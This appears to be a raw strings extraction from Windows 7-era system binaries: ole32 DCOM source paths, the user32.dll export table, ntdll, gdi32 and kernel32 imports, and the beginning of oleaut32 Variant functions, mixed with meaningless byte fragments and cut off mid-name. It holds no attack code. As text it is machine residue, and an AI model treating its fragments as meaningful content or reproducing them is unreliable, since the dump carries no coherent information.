IOleInPlaceUIWindow IOleWindow IOleInPlaceObject IOleObjev t$Pj@ QQS3 uSVW tYS3 WjPX QRPh C4VW |~9] SVWj uVW3 PVVj ;=Pt Stck PWVj >Heap _^[] | VS _^[] uBVQQQ _^[] SVW3 _^[] DllGetClassObject DllCanUnloadNow QQSW FFHu PPPP f99u HII; |Ij' F@ u 0rEf @^[] @_[^] uh@% uh@% uh@% uh@% uh@% uh@% uh@% QSVWh H(QP RVSP SVWh _^[] ud:\w7rtm\com\ole32\com\dcomrem\riftbl.cxx d:\w7rtm\com\ole32\com\dcomrem\marshal.cxx (*_pLock) d:\w7rtm\com\ole32\com\dcomrem\pstable.cxx gPSLock gChannelInitLock d:\w7rtm\com\ole32\com\dcomrem\refcache.cxx d:\w7rtm\com\ole32\com\dcomrem\service.cxx d:\w7rtm\com\ole32\com\dcomrem\chock.cxx d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx _mxsCtxChnlLock QRPh Fhyf d:\w7rtm\com\ole32\com\dcomrem\call.cxx QQSVW uSVW t 9w SVWh ud:\w7rtm\com\ole32\com\dcomrem\chancont.cxx _mxsEventCache d:\w7rtm\com\ole32\com\dcomrem\stdid.cxx H@9P@ _^[] QSVWh 9F8^ SVWjdX |/W; u 9] _^[] VVVV QRPh _^[] !C@j t*9^ _mxsCtxCallLock d:\w7rtm\com\ole32\com\objact\dllhost.cxx SVWh u_^[ _^[] uSj~ SVWh _^[u N$_^; Stck VVVV uSVW3 G S3 uh(n Hl5~ d:\w7rtm\com\ole32\com\dcomrem\callmgr.cxx gChnlCallLock SVWh| _^[] SVW _^[] uhPz uhPz tBSW QSV3 ut1W d:\w7rtm\com\ole32\com\dcomrem\hash.cxx w1W3 YG;=\ SVWh t!V3 @^[] _^[] QQVW tMWWWW Vh(w rpcrt4.dll I_RpcInitNdrImports SVWj HookSwitchHookEnabledEvent P`+Pd PQh8v @0SVW3 SVW3 4?Vj _95, SVhx uSVW3 PQh8v QSVW AACCN _^[] t$f9 FFJu |-9} u)!E d:\w7rtm\com\ole32\com\dcomrem\crossctx.hxx s_allocLock QL^] QL^] d:\w7rtm\com\ole32\com\dcomrem\crossctx.cxx d:\w7rtm\com\ole32\com\objact\actvator.hxx uu&9 PPjPh u@_^ VWh$u Vj{Y _^[] |+9} 9w@$ F.^[] u=9} u89~(t3 u=9} u89~ t3 u 9} E SV3 ;5Pt Stck 8Heap N@W3 9^8t 9^0v G;~0r F,WP F\WP [_^] tIVW _^[] WVh!p _^[] v%SV3 ^[_] p@Wj =PRPS 9q t 9q t PRPS QSVW u 9q @u1VSS Q$9; QVW3 H ^] WPPR Ph< +q0; Ph*3 "u!3 @@Ju FxPj@ RWWP =DSTRt f;FX u=xu u=xu u=xu VWQh@ 9SVW u=xu VRQh@ u=xu WSj@ u=xu WSjA u=xu u=xu u=xu u=xu RPQW F\9X@ RPQW u=xu u=xu u=xu u=xu u=xu u=xu u=xu u=xu t>hxr u=xu Rh$X u=xu u=xu u=xu RPQW u=xu u=xu u=xu QWhx u=xu QWhx Heap f;AH j}Xf;GJ Heap uShT PVShT u=xu u=xu u=xu u=xu F % F % u=xu u=xu u=xu u=xu u=xu Ph;uwFFf9 >(ub9 u0j$XP Pj@A uD9] @@f; FPFj j;Xf j;Xf j;Xf j;Xf j;Xf FFSOWV 4Ft3 vej;Xf j)Xf jWX_^[ @SV3 @@f; @@f; @@f; @@f; j:hh< uhl< uhT< <6t" j:hP< uhl< j:hP< uhT< 8@@f jWX_^[ t)hL :jW[ :jW[ jWX^[ t'9} jW^V t&9] jW^V ut AA _^[] : t5V )t'f }t!f \PT >\PT >\PT !This program cannot be run in DOS mode. QARichj .text `.data .rsrc @.reloc Yqw2 qwEWqw qw+Gqw jsw7 Eqw/Fqw Rqwynqw qw-sswf qw'Wqwl qwM mw pwCGqw[Gqw7 rwNnrw Brw3 Trw" qwj-qw qw$r"S r$SW PPj K(Qj _^[] 8RIFF HVWt j hx E(9} j(X; t 9} j,h 9RIFF WPS; @@f; @@f; uj@^V u_9] t"9] @YY; VVVh @^_[] V\Wj E(S3 1AAf VWj Y tSSSh t"SS E$9E |'9^ SVWj ~d+~ _^[] C*VW u4;5 _^[] tGHt"Hu tSHHtCHHt-H t ;M _^[] [_^] SVW3 VWj Y _^[] t$FFf j,h8 =.cmd =.pif =.lnk =.com =.bat N ;N F ;F F ;F @_^[ .exe QQV3 SWj2 FDf; @^[] H4+H _@^] t 9N _^[] @@f; t Wj u_^] 6SSSSh u_^[ C@VP @_^[ F,PSV ^_[] IIt uCSP ^_[] PPPP jNPQ @VWf9 uY_^[ @_[^ QQVW3 9H[_^ @[^_] Ad+A _^[] WSWSh PSVj PVPh t SW<%t4 ~ESW _[^] Ht<- @^_] Cd+C u$VPR _d+_ ;H t t ;H(u PPPP t7VW @[_^ t|Ht9 SVW3 +PT3 _^[] u VSj F0;F$~ F$^[] PWSV _^[] _^[] _^[] USER32.dll ActivateKeyboardLayout AddClipboardFormatListener AdjustWindowRect AdjustWindowRectEx AlignRects AllowForegroundActivation AllowSetForegroundWindow AnimateWindow AnyPopup AppendMenuA AppendMenuW ArrangeIconicWindows AttachThreadInput BeginDeferWindowPos BeginPaint BlockInput BringWindowToTop BroadcastSystemMessage BroadcastSystemMessageA BroadcastSystemMessageExA BroadcastSystemMessageExW BroadcastSystemMessageW BuildReasonArray CalcMenuBar CalculatePopupWindowPosition CallMsgFilter CallMsgFilterA CallMsgFilterW CallNextHookEx CallWindowProcA CallWindowProcW CancelShutdown CascadeChildWindows CascadeWindows ChangeClipboardChain ChangeDisplaySettingsA ChangeDisplaySettingsExA ChangeDisplaySettingsExW ChangeDisplaySettingsW ChangeMenuA ChangeMenuW ChangeWindowMessageFilter ChangeWindowMessageFilterEx CharLowerA CharLowerBuffA CharLowerBuffW CharLowerW CharNextA CharNextExA CharNextW CharPrevA CharPrevExA CharPrevW CharToOemA CharToOemBuffA CharToOemBuffW CharToOemW CharUpperA CharUpperBuffA CharUpperBuffW CharUpperW CheckDesktopByThreadId CheckDlgButton CheckMenuItem CheckMenuRadioItem CheckRadioButton CheckWindowThreadDesktop ChildWindowFromPoint ChildWindowFromPointEx CliImmSetHotKey ClientThreadSetup ClientToScreen ClipCursor CloseClipboard CloseDesktop CloseGestureInfoHandle CloseTouchInputHandle CloseWindow CloseWindowStation ConsoleControl ControlMagnification CopyAcceleratorTableA CopyAcceleratorTableW CopyIcon CopyImage CopyRect CountClipboardFormats CreateAcceleratorTableA CreateAcceleratorTableW CreateCaret CreateCursor CreateDesktopA CreateDesktopExA CreateDesktopExW CreateDesktopW CreateDialogIndirectParamA CreateDialogIndirectParamAorW CreateDialogIndirectParamW CreateDialogParamA CreateDialogParamW CreateIcon CreateIconFromResource CreateIconFromResourceEx CreateIconIndirect CreateMDIWindowA CreateMDIWindowW CreateMenu CreatePopupMenu CreateSystemThreads CreateWindowExA CreateWindowExW CreateWindowStationA CreateWindowStationW CsrBroadcastSystemMessageExW CtxInitUser32 DdeAbandonTransaction DdeAccessData DdeAddData DdeClientTransaction DdeCmpStringHandles DdeConnect DdeConnectList DdeCreateDataHandle DdeCreateStringHandleA DdeCreateStringHandleW DdeDisconnect DdeDisconnectList DdeEnableCallback DdeFreeDataHandle DdeFreeStringHandle DdeGetData DdeGetLastError DdeGetQualityOfService DdeImpersonateClient DdeInitializeA DdeInitializeW DdeKeepStringHandle DdeNameService DdePostAdvise DdeQueryConvInfo DdeQueryNextServer DdeQueryStringA DdeQueryStringW DdeReconnect DdeSetQualityOfService DdeSetUserHandle DdeUnaccessData DdeUninitialize DefDlgProcA DefDlgProcW DefFrameProcA DefFrameProcW DefMDIChildProcA DefMDIChildProcW DefRawInputProc DefWindowProcA DefWindowProcW DeferWindowPos DeleteMenu DeregisterShellHookWindow DestroyAcceleratorTable DestroyCaret DestroyCursor DestroyIcon DestroyMenu DestroyReasons DestroyWindow DeviceEventWorker DialogBoxIndirectParamA DialogBoxIndirectParamAorW DialogBoxIndirectParamW DialogBoxParamA DialogBoxParamW DisableProcessWindowsGhosting DispatchMessageA DispatchMessageW DisplayConfigGetDeviceInfo DisplayConfigSetDeviceInfo DisplayExitWindowsWarnings DlgDirListA DlgDirListComboBoxA DlgDirListComboBoxW DlgDirListW DlgDirSelectComboBoxExA DlgDirSelectComboBoxExW DlgDirSelectExA DlgDirSelectExW DoSoundConnect DoSoundDisconnect DragDetect DragObject DrawAnimatedRects DrawCaption DrawCaptionTempA DrawCaptionTempW DrawEdge DrawFocusRect DrawFrame DrawFrameControl DrawIcon DrawIconEx DrawMenuBar DrawMenuBarTemp DrawStateA DrawStateW DrawTextA DrawTextExA DrawTextExW DrawTextW DwmGetDxSharedSurface DwmStartRedirection DwmStopRedirection EditWndProc EmptyClipboard EnableMenuItem EnableScrollBar EnableWindow EndDeferWindowPos EndDialog EndMenu EndPaint EndTask EnterReaderModeHelper EnumChildWindows EnumClipboardFormats EnumDesktopWindows EnumDesktopsA EnumDesktopsW EnumDisplayDevicesA EnumDisplayDevicesW EnumDisplayMonitors EnumDisplaySettingsA EnumDisplaySettingsExA EnumDisplaySettingsExW EnumDisplaySettingsW EnumPropsA EnumPropsExA EnumPropsExW EnumPropsW EnumThreadWindows EnumWindowStationsA EnumWindowStationsW EnumWindows EqualRect ExcludeUpdateRgn ExitWindowsEx FillRect FindWindowA FindWindowExA FindWindowExW FindWindowW FlashWindow FlashWindowEx FrameRect FreeDDElParam FrostCrashedWindow GetActiveWindow GetAltTabInfo GetAltTabInfoA GetAltTabInfoW GetAncestor GetAppCompatFlags GetAppCompatFlags2 GetAsyncKeyState GetCapture GetCaretBlinkTime GetCaretPos GetClassInfoA GetClassInfoExA GetClassInfoExW GetClassInfoW GetClassLongA GetClassLongW GetClassNameA GetClassNameW GetClassWord GetClientRect GetClipCursor GetClipboardData GetClipboardFormatNameA GetClipboardFormatNameW GetClipboardOwner GetClipboardSequenceNumber GetClipboardViewer GetComboBoxInfo GetCursor GetCursorFrameInfo GetCursorInfo GetCursorPos GetDC GetDCEx GetDesktopWindow GetDialogBaseUnits GetDisplayConfigBufferSizes GetDlgCtrlID GetDlgItem GetDlgItemInt GetDlgItemTextA GetDlgItemTextW GetDoubleClickTime GetFocus GetForegroundWindow GetGUIThreadInfo GetGestureConfig GetGestureExtraArgs GetGestureInfo GetGuiResources GetIconInfo GetIconInfoExA GetIconInfoExW GetInputDesktop GetInputLocaleInfo GetInputState GetInternalWindowPos GetKBCodePage GetKeyNameTextA GetKeyNameTextW GetKeyState GetKeyboardLayout GetKeyboardLayoutList GetKeyboardLayoutNameA GetKeyboardLayoutNameW GetKeyboardState GetKeyboardType GetLastActivePopup GetLastInputInfo GetLayeredWindowAttributes GetListBoxInfo GetMagnificationDesktopColorEffect GetMagnificationDesktopMagnification GetMagnificationLensCtxInformation GetMenu GetMenuBarInfo GetMenuCheckMarkDimensions GetMenuContextHelpId GetMenuDefaultItem GetMenuInfo GetMenuItemCount GetMenuItemID GetMenuItemInfoA GetMenuItemInfoW GetMenuItemRect GetMenuState GetMenuStringA GetMenuStringW GetMessageA GetMessageExtraInfo GetMessagePos GetMessageTime GetMessageW GetMonitorInfoA GetMonitorInfoW GetMouseMovePointsEx GetNextDlgGroupItem GetNextDlgTabItem GetOpenClipboardWindow GetParent GetPhysicalCursorPos GetPriorityClipboardFormat GetProcessDefaultLayout GetProcessWindowStation GetProgmanWindow GetPropA GetPropW GetQueueStatus GetRawInputBuffer GetRawInputData GetRawInputDeviceInfoA GetRawInputDeviceInfoW GetRawInputDeviceList GetReasonTitleFromReasonCode GetRegisteredRawInputDevices GetScrollBarInfo GetScrollInfo GetScrollPos GetScrollRange GetSendMessageReceiver GetShellWindow GetSubMenu GetSysColor GetSysColorBrush GetSystemMenu GetSystemMetrics GetTabbedTextExtentA GetTabbedTextExtentW GetTaskmanWindow GetThreadDesktop GetTitleBarInfo GetTopLevelWindow GetTopWindow GetTouchInputInfo GetUpdateRect GetUpdateRgn GetUpdatedClipboardFormats GetUserObjectInformationA GetUserObjectInformationW GetUserObjectSecurity GetWinStationInfo GetWindow GetWindowCompositionAttribute GetWindowCompositionInfo GetWindowContextHelpId GetWindowDC GetWindowDisplayAffinity GetWindowInfo GetWindowLongA GetWindowLongW GetWindowMinimizeRect GetWindowModuleFileName GetWindowModuleFileNameA GetWindowModuleFileNameW GetWindowPlacement GetWindowRect GetWindowRgn GetWindowRgnBox GetWindowRgnEx GetWindowTextA GetWindowTextLengthA GetWindowTextLengthW GetWindowTextW GetWindowThreadProcessId GetWindowWord GhostWindowFromHungWindow GrayStringA GrayStringW HideCaret HiliteMenuItem HungWindowFromGhostWindow IMPGetIMEA IMPGetIMEW IMPQueryIMEA IMPQueryIMEW IMPSetIMEA IMPSetIMEW ImpersonateDdeClientWindow InSendMessage InSendMessageEx InflateRect InitializeLpkHooks InsertMenuA InsertMenuItemA InsertMenuItemW InsertMenuW InternalGetWindowIcon InternalGetWindowText IntersectRect InvalidateRect InvalidateRgn InvertRect IsCharAlphaA IsCharAlphaNumericA IsCharAlphaNumericW IsCharAlphaW IsCharLowerA IsCharLowerW IsCharUpperA IsCharUpperW IsChild IsClipboardFormatAvailable IsDialogMessage IsDialogMessageA IsDialogMessageW IsDlgButtonChecked IsGUIThread IsHungAppWindow IsIconic IsMenu IsProcessDPIAware IsRectEmpty IsSETEnabled IsServerSideWindow IsThreadDesktopComposited IsTopLevelWindow IsTouchWindow IsWinEventHookInstalled IsWindow IsWindowEnabled IsWindowInDestroy IsWindowRedirectedForPrint IsWindowUnicode IsWindowVisible IsWow64Message IsZoomed KillTimer LoadAcceleratorsA LoadAcceleratorsW LoadBitmapA LoadBitmapW LoadCursorA LoadCursorFromFileA LoadCursorFromFileW LoadCursorW LoadIconA LoadIconW LoadImageA LoadImageW LoadKeyboardLayoutA LoadKeyboardLayoutEx LoadKeyboardLayoutW LoadLocalFonts LoadMenuA LoadMenuIndirectA LoadMenuIndirectW LoadMenuW LoadRemoteFonts LoadStringA LoadStringW LockSetForegroundWindow LockWindowStation LockWindowUpdate LockWorkStation LogicalToPhysicalPoint LookupIconIdFromDirectory LookupIconIdFromDirectoryEx MBToWCSEx MB_GetString MapDialogRect MapVirtualKeyA MapVirtualKeyExA MapVirtualKeyExW MapVirtualKeyW MapWindowPoints MenuItemFromPoint MenuWindowProcA MenuWindowProcW MessageBeep MessageBoxA MessageBoxExA MessageBoxExW MessageBoxIndirectA MessageBoxIndirectW MessageBoxTimeoutA MessageBoxTimeoutW MessageBoxW ModifyMenuA ModifyMenuW MonitorFromPoint MonitorFromRect MonitorFromWindow MoveWindow MsgWaitForMultipleObjects MsgWaitForMultipleObjectsEx NotifyOverlayWindow NotifyWinEvent OemKeyScan OemToCharA OemToCharBuffA OemToCharBuffW OemToCharW OffsetRect OpenClipboard OpenDesktopA OpenDesktopW OpenIcon OpenInputDesktop OpenThreadDesktop OpenWindowStationA OpenWindowStationW PackDDElParam PaintDesktop PaintMenuBar PaintMonitor PeekMessageA PeekMessageW PhysicalToLogicalPoint PostMessageA PostMessageW PostQuitMessage PostThreadMessageA PostThreadMessageW PrintWindow PrivateExtractIconExA PrivateExtractIconExW PrivateExtractIconsA PrivateExtractIconsW PrivateRegisterICSProc PtInRect QueryDisplayConfig QuerySendMessage RealChildWindowFromPoint RealGetWindowClass RealGetWindowClassA RealGetWindowClassW ReasonCodeNeedsBugID ReasonCodeNeedsComment RecordShutdownReason RedrawWindow RegisterClassA RegisterClassExA RegisterClassExW RegisterClassW RegisterClipboardFormatA RegisterClipboardFormatW RegisterDeviceNotificationA RegisterDeviceNotificationW RegisterErrorReportingDialog RegisterFrostWindow RegisterGhostWindow RegisterHotKey RegisterLogonProcess RegisterMessagePumpHook RegisterPowerSettingNotification RegisterRawInputDevices RegisterServicesProcess RegisterSessionPort RegisterShellHookWindow RegisterSystemThread RegisterTasklist RegisterTouchWindow RegisterUserApiHook RegisterWindowMessageA RegisterWindowMessageW ReleaseCapture ReleaseDC RemoveClipboardFormatListener RemoveMenu RemovePropA RemovePropW ReplyMessage ResolveDesktopForWOW ReuseDDElParam ScreenToClient ScrollChildren ScrollDC ScrollWindow ScrollWindowEx SendDlgItemMessageA SendDlgItemMessageW SendIMEMessageExA SendIMEMessageExW SendInput SendMessageA SendMessageCallbackA SendMessageCallbackW SendMessageTimeoutA SendMessageTimeoutW SendMessageW SendNotifyMessageA SendNotifyMessageW SetActiveWindow SetCapture SetCaretBlinkTime SetCaretPos SetClassLongA SetClassLongW SetClassWord SetClipboardData SetClipboardViewer SetCursor SetCursorContents SetCursorPos SetDebugErrorLevel SetDeskWallpaper SetDisplayConfig SetDlgItemInt SetDlgItemTextA SetDlgItemTextW SetDoubleClickTime SetFocus SetForegroundWindow SetGestureConfig SetInternalWindowPos SetKeyboardState SetLastErrorEx SetLayeredWindowAttributes SetMagnificationDesktopColorEffect SetMagnificationDesktopMagnification SetMagnificationLensCtxInformation SetMenu SetMenuContextHelpId SetMenuDefaultItem SetMenuInfo SetMenuItemBitmaps SetMenuItemInfoA SetMenuItemInfoW SetMessageExtraInfo SetMessageQueue SetMirrorRendering SetParent SetPhysicalCursorPos SetProcessDPIAware SetProcessDefaultLayout SetProcessWindowStation SetProgmanWindow SetPropA SetPropW SetRect SetRectEmpty SetScrollInfo SetScrollPos SetScrollRange SetShellWindow SetShellWindowEx SetSysColors SetSysColorsTemp SetSystemCursor SetSystemMenu SetTaskmanWindow SetThreadDesktop SetTimer SetUserObjectInformationA SetUserObjectInformationW SetUserObjectSecurity SetWinEventHook SetWindowCompositionAttribute SetWindowContextHelpId SetWindowDisplayAffinity SetWindowLongA SetWindowLongW SetWindowPlacement SetWindowPos SetWindowRgn SetWindowRgnEx SetWindowStationUser SetWindowTextA SetWindowTextW SetWindowWord SetWindowsHookA SetWindowsHookExA SetWindowsHookExW SetWindowsHookW SfmDxBindSwapChain SfmDxGetSwapChainStats SfmDxOpenSwapChain SfmDxQuerySwapChainBindingStatus SfmDxReleaseSwapChain SfmDxReportPendingBindingsToDwm SfmDxSetSwapChainBindingStatus SfmDxSetSwapChainStats ShowCaret ShowCursor ShowOwnedPopups ShowScrollBar ShowStartGlass ShowSystemCursor ShowWindow ShowWindowAsync ShutdownBlockReasonCreate ShutdownBlockReasonDestroy ShutdownBlockReasonQuery SoftModalMessageBox SoundSentry SubtractRect SwapMouseButton SwitchDesktop SwitchDesktopWithFade SwitchToThisWindow SystemParametersInfoA SystemParametersInfoW TabbedTextOutA TabbedTextOutW TileChildWindows TileWindows ToAscii ToAsciiEx ToUnicode ToUnicodeEx TrackMouseEvent TrackPopupMenu TrackPopupMenuEx TranslateAccelerator TranslateAcceleratorA TranslateAcceleratorW TranslateMDISysAccel TranslateMessage TranslateMessageEx UnhookWinEvent UnhookWindowsHook UnhookWindowsHookEx UnionRect UnloadKeyboardLayout UnlockWindowStation UnpackDDElParam UnregisterClassA UnregisterClassW UnregisterDeviceNotification UnregisterHotKey UnregisterMessagePumpHook UnregisterPowerSettingNotification UnregisterSessionPort UnregisterTouchWindow UnregisterUserApiHook UpdateLayeredWindow UpdateLayeredWindowIndirect UpdatePerUserSystemParameters UpdateWindow UpdateWindowTransform User32InitializeImmEntryTable UserClientDllInitialize UserHandleGrantAccess UserLpkPSMTextOut UserLpkTabbedTextOut UserRealizePalette UserRegisterWowHandlers VRipOutput VTagOutput ValidateRect ValidateRgn VkKeyScanA VkKeyScanExA VkKeyScanExW VkKeyScanW WCSToMBEx WINNLSEnableIME WINNLSGetEnableStatus WINNLSGetIMEHotkey WaitForInputIdle WaitMessage WinHelpA WinHelpW WindowFromDC WindowFromPhysicalPoint WindowFromPoint _UserTestTokenForInteractive gSharedInfo gapfnScSendMessage keybd_event mouse_event wsprintfA wsprintfW wvsprintfA wvsprintfW Y__^[ ut 9 VWSh [_^] t ;H( j@kk@kkkk QSVd @^[_] Ghost DDEMLUnicodeServer DDEMLAnsiServer DDEMLUnicodeClient DDEMLAnsiClient DDEMLMom Static MDIClient ListBox Edit ComboLBox ComboBox Button uuiWj,3 uShP u?9= uWWW N(^] u@_^[ t89E AACCN _^[] t"f9 @@Nu t ;M t|hX tkh@ tZh( CtfImmGetCompatibleKeyboardLayout CtfImmSetDefaultRemoteKeyboardLayout CtfImmNotify CtfImmDispatchDefImeMessage CtfImmHideToolbarWnd CtfImmRestoreToolbarWnd CtfImmTIMActivate ImmSystemHandler ImmEnumInputContext ImmSetCompositionStringW ImmSetCompositionStringA ImmGetProperty ImmPutImeMenuItemsIntoMappedFile ImmProcessKey ImmLoadLayout ImmTranslateMessage ImmSetActiveContext ImmGetOpenStatus ImmUnlockImeDpi ImmLockImeDpi ImmGetImeInfoEx ImmSetStatusWindowPos ImmSetConversionStatus ImmGetConversionStatus ImmConfigureIMEW ImmSetCandidateWindow ImmGetCandidateWindow ImmActivateLayout ImmFreeLayout ImmSetOpenStatus ImmLoadIME ImmUnlockIMC ImmLockIMC ImmNotifyIME ImmSetCompositionWindow ImmSetCompositionFontA ImmSetCompositionFontW ImmGetCompositionFontA ImmGetCompositionFontW ImmRegisterClient ImmReleaseContext ImmIsIME ImmGetDefaultIMEWnd ImmGetContext ImmGetCompositionWindow ImmGetCompositionStringW ImmGetCompositionStringA ImmEscapeW ImmEscapeA ImmAssociateContext ImmIMPSetIMEA ImmIMPSetIMEW ImmIMPQueryIMEA ImmIMPQueryIMEW ImmIMPGetIMEA ImmIMPGetIMEW ImmSendIMEMessageExA ImmSendIMEMessageExW ImmWINNLSGetEnableStatus ImmWINNLSEnableIME QSVWh u@_^[ |0SVW _^[] 9~(t4S ~(9~ u[_^] u 9u PSWj ^d+^ BRQj uSj@ uWWWW u:9M tAIt5 SV9E HHt1HtA SSWV @<)F H&Yj F$W3 Xf9E FFj GfPj 0SVW Fd+F _[^] jOWS PPh4 jCPPPPP 6jZV SSh` ;Lu3 WWSP PPPPP ~4+=P u9X| SSSS SSSS SSSS PSSSSSS PPPPPR HH+PD+H@RQ uWPS @_^[ uw23 uw23 PVPh C4V; PPPPP _^[] Fx;Gxv WWh4 s8;5 _^[] _^[] @_^[ f9^> u_^[ tUjWSh wd+w jWSj\V t?+F WWPj0V SVW3 N4;H4 t +B J4+J A8+A PowerSettingUnregisterNotification ^_[] wd+w l;F | ^4+^ VVVV jeXj0f Xj1f |;h( | 9] uj V uj S QPPP |lhX# 0f;1u tVVj ;G _ uPjI VVVVj VVVVj F0!] u f; F(9V,u UtfHH tFHt& @@f; uSWP *t?IItKItA u f; u 9M t*f; PVWj t3f; t*9} @t!3 {H+} t>;u v4+5P v4+5P w-;} s(RPRP v4+5P v4+5P CRPRP wA;} w*;] s%RPRP SSh` SShp W<;Pt(W @_^] AlV; v f9H QRPh QRPh QRPh,f QRPhLf ADVAPI32.dll CFGMGR32.dll MSIMG32.dll POWRPROF.dll WINSTA.dll CheckTokenMembership ReportEventW RegisterEventSourceW OpenProcessToken OpenThreadToken GetTokenInformation DeregisterEventSource CM_MapCrToWin32Err CMP_RegisterNotification CMP_UnregisterNotification AlphaBlend PowerSetActiveScheme PowerWriteDCValueIndex PowerWriteACValueIndex PowerGetActiveScheme WinStationGetLoggedOnCount WinStationSendMessageW WinStationQueryInformationW KERNEL32.dll GDI32.dll ntdll.dll RtlUnwind RtlSetLastWin32Error NlsAnsiCodePage _aulldvrm _wtoi _alldiv wcsncpy_s iswspace qsort LdrFlushAlternateResourceModules RtlCheckRegistryKey RtlMultiByteToUnicodeSize RtlPcToFileHeader wcsrchr RtlImageNtHeader NtRaiseHardError wcsncat_s RtlIsNameLegalDOS8Dot3 strrchr sscanf_s strcpy_s RtlSizeHeap RtlGetThreadLangIdByIndex RtlRunEncodeUnicodeString RtlRunDecodeUnicodeString RtlReAllocateHeap CsrAllocateMessagePointer RtlAllocateAndInitializeSid RtlFreeSid CsrAllocateCaptureBuffer CsrCaptureMessageBuffer CsrFreeCaptureBuffer RtlNtStatusToDosError NtOpenThreadToken NtOpenProcessToken NtQueryInformationToken CsrClientCallServer memmove NtCallbackReturn _allmul RtlUnicodeToMultiByteSize RtlInitializeCriticalSection NtQuerySystemInformation RtlDeleteCriticalSection RtlGetIntegerAtom _stricmp _wcsicmp CsrClientConnectToServer RtlIsThreadWithinLoaderCallout NtYieldExecution NtCreateKey NtSetValueKey NtDeleteValueKey NtOpenDirectoryObject wcstoul NtVdmControl _vsnwprintf RtlQueryInformationActiveActivationContext RtlCreateUnicodeStringFromAsciiz RtlInitAnsiString RtlAnsiStringToUnicodeString RtlFreeUnicodeString NtSetSecurityObject NtQuerySecurityObject NtQueryInformationProcess wcstol RtlActivateActivationContextUnsafeFast RtlDeactivateActivationContextUnsafeFast RtlFindActivationContextSectionString RtlReleaseActivationContext RtlMultiByteToUnicodeN RtlUnicodeToMultiByteN RtlLeaveCriticalSection RtlEnterCriticalSection memset memcpy RtlAllocateHeap RtlFreeHeap RtlOpenCurrentUser NtEnumerateKey wcscpy_s wcscat_s NtOpenKey NtClose NtQueryValueKey swprintf_s RtlInitUnicodeString RtlUnicodeStringToInteger CreateFontIndirectW GetClipRgn ExtSelectClipRgn GetHFONT GetMapMode SetGraphicsMode GetClipBox CreateRectRgn CreateRectRgnIndirect SetLayout GetBoundsRect ExcludeClipRect PlayEnhMetaFile Ellipse CreateEllipticRgn GdiFixUpHandle CreatePen Rectangle GetTextCharacterExtra SetTextCharacterExtra GetCurrentObject GetViewportOrgEx SetViewportOrgEx PolyPatBlt CreateBrushIndirect SetBoundsRect CopyEnhMetaFileW CopyMetaFileW GetPaletteEntries CreatePalette SetPaletteEntries GetPixel ExtTextOutA GetTextCharsetInfo QueryFontAssocStatus GetCharWidthInfo GetCharWidthA GetTextFaceW GetCharABCWidthsA GetCharABCWidthsW SetBrushOrgEx EnumFontsW GetTextFaceAliasW GetTextMetricsW GetTextColor GdiGetCodePage GetTextCharset GetBkMode GetViewportExtEx GetWindowExtEx GdiGetCharDimensions GdiPrinterThunk GdiLoadType1Fonts GdiAddFontResourceW TranslateCharsetInfo SaveDC OffsetWindowOrgEx RestoreDC ExtTextOutW GetDIBits CreateDIBSection SetStretchBltMode SelectPalette RealizePalette SetDIBits CreateDCW CreateDIBitmap CreateCompatibleBitmap SetBitmapBits DeleteDC GdiValidateHandle GdiDllInitialize GdiProcessSetup GetStockObject CreateSolidBrush CreateCompatibleDC GdiConvertBitmapV5 GdiCreateLocalEnhMetaFile GdiCreateLocalMetaFilePict GetRgnBox CombineRgn OffsetRgn MirrorRgn EnableEUDC GdiConvertToDevmodeW GetTextExtentPointA GetTextExtentPointW CreateBitmap SetLayoutWidth PatBlt TextOutA TextOutW SetTextAlign GetTextAlign IntersectClipRect SelectObject SetBkMode GetBkColor GetObjectW SetTextColor SetBkColor GetLayout StretchDIBits GetDeviceCaps GetDIBColorTable GdiGetBitmapBitsSize DeleteObject DeleteMetaFile DeleteEnhMetaFile GdiConvertMetaFilePict GdiConvertEnhMetaFile GdiReleaseDC StretchBlt GetObjectType GdiConvertAndCheckDC SetRectRgn BitBlt GlobalFindAtomW SetLastError InterlockedDecrement InterlockedIncrement GetACP LocalReAlloc LocalLock LocalUnlock LocalSize LoadAppInitDlls GetCurrentThreadId GetModuleHandleW QueryActCtxSettingsW RegisterWaitForInputIdle SizeofResource LoadResource LoadStringBaseExW FindResourceExW FindResourceExA DisableThreadLibraryCalls IsDBCSLeadByteEx GetSystemDirectoryW SearchPathW ExpandEnvironmentStringsW LoadLibraryExW GlobalAddAtomW GetCurrentThread ExitThread GetExitCodeThread CreateThread GlobalHandle FoldStringW Sleep GetStringTypeW GetStringTypeA GetCPInfo CompareStringW FindResourceW CloseHandle ReadFile SetFileTime EnumResourceNamesExW CreateProcessW GetSystemWindowsDirectoryW AddAtomA AddAtomW GetAtomNameA GetAtomNameW IsValidLocale ConvertDefaultLocale GetCurrentDirectoryW SetCurrentDirectoryW lstrlenW GetLogicalDrives FindClose FindNextFileW FindFirstFileW GetThreadLocale MulDiv ProcessIdToSessionId GetCurrentProcessId WerpNotifyUseStringResource InterlockedCompareExchange IsDBCSLeadByte GetVersionExW RegQueryValueExW RegOpenKeyExW RegEnumValueW RegQueryInfoKeyW GetSystemDefaultLangID WerpNotifyLoadStringResource UnmapViewOfFile GetFileSize MapViewOfFile CreateFileMappingW LCMapStringW QueryPerformanceCounter QueryPerformanceFrequency GetTickCount lstrlenA GlobalFindAtomA GetModuleFileNameA GetModuleHandleA GlobalAddAtomA DelayLoadFailureHook LoadLibraryExA GetSystemTimeAsFileTime TerminateProcess UnhandledExceptionFilter SetUnhandledExceptionFilter WritePrivateProfileStringW GetPrivateProfileStringW RegSetValueExW RegCloseKey RegCreateKeyExW RegDeleteKeyExW GetUserDefaultLCID GlobalUnlock GlobalLock GlobalSize LocalFree GlobalDeleteAtom LocalAlloc DeleteAtom FreeLibrary GetProcAddress LoadLibraryW InterlockedExchange GlobalGetAtomNameA GlobalGetAtomNameW GetModuleFileNameW GlobalFree GetLocaleInfoW GlobalFlags WideCharToMultiByte GetCurrentProcess GetLastError GetOEMCP GlobalReAlloc MultiByteToWideChar GlobalAlloc WaitForMultipleObjectsEx SetEvent CreateFileW lstrcmpiW RSDS#n2M n user32.pdb qw+Gqw wEWqw ~~Ht- u?GJt Kt29Jt windows.hlp !This program cannot be run in DOS mode. ;K"p =K8p :K6p ,KAp !~w IANT_UserSize VARIANT_UserUnmarshal VarAbs VarAdd VarAnd VarBoolFromCy VarBoolFromDate VarBoolFromDec VarBoolFromDisp VarBoolFromI1 VarBoolFromI2 VarBoolFromI4 VarBoolFromI8 VarBoolFromR4 VarBoolFromR8 VarBoolFromStr VarBoolFromUI1 VarBoolFromUI2 VarBoolFromUI4 